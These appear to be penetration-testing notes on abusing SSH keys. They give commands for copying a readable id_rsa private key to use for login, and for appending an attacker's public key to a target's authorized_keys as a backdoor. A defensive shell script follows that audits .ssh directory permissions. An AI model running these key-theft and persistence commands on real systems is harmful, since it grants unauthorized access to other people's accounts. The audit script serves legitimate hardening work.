If read access is available to a user's .ssh directory (e.g., "/home/user/.ssh/" or "/root/.ssh/"), it is possible to exfiltrate the private SSH key "id_rsa". Once copied to the attacker's machine, this key can be used to authenticate as that user via SSH using the -i flag.
READ ACCESS
root@oco:~$ vim id_rsa
...
paste copied key value
root@oco:~$ chmod 600 id_rsa
* restrictive permissions on the key file are required; otherwise
ssh will refuse to use the key
root@oco:~$ ssh root@10.10.10.10 -i id_rsa
root@10.10.10.10#
WRITE ACCESS
With write access to a target user's .ssh directory, an attacker can append their public key to the target's authorized_keys file, granting SSH access as that user. This technique only works if the attacker already has control over the target user, as most SSH configurations will reject keys added by unauthorized users.
root@oco:~$ ssh-keygen -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): *******
Enter same passphrase again: *******
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:...SNIP... user@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o.++.+ |
...SNIP...
| . ..oo+. |
+----[SHA256]-----+
user@target:~$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
* Copy the contents of key.pub and append it to the target user's authorized_keys
#access the target
root@oco:~$ ssh -i {key} root@10.10.10.10
root@remotehost#
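From the defender's side, both the READ ACCESS and WRITE ACCESS cases above come down to group/other permission bits on the .ssh directory and the files in it. The following audit script is an added example, not part of the original notes; the function names `go_bits` and `audit_ssh_dir` and the READ/WRITE finding labels are this example's own.

```shell
#!/bin/sh
# Added example: flag permission settings in one .ssh directory that allow
# the key copy (read) or the authorized_keys append (write) described above.

# Print the six group/other permission characters of a path, e.g. "r-xr-x".
go_bits() { ls -ld "$1" | cut -c5-10; }

# audit_ssh_dir DIR: print one finding per line; print nothing if DIR is clean.
audit_ssh_dir() {
    dir=$1
    [ -d "$dir" ] || return 0
    # A group/other-writable directory lets another account replace
    # authorized_keys even when the file itself is 0600.
    case $(go_bits "$dir") in
        *w*) echo "WRITE $dir" ;;
    esac
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        bits=$(go_bits "$f")
        case ${f##*/} in
            authorized_keys|authorized_keys2)
                case $bits in *w*) echo "WRITE $f" ;; esac
                continue ;;
        esac
        # Identify private keys by their PEM header, not by file name.
        if head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----'; then
            [ "$bits" = "------" ] || echo "READ $f"
        fi
    done
}

# Audit the directory given as the first argument, e.g. /home/user/.ssh
if [ -n "${1:-}" ]; then audit_ssh_dir "$1"; fi
```

Run it against each account's .ssh directory; an empty result means no group/other exposure was found by these checks, which cover file modes only and not ACLs.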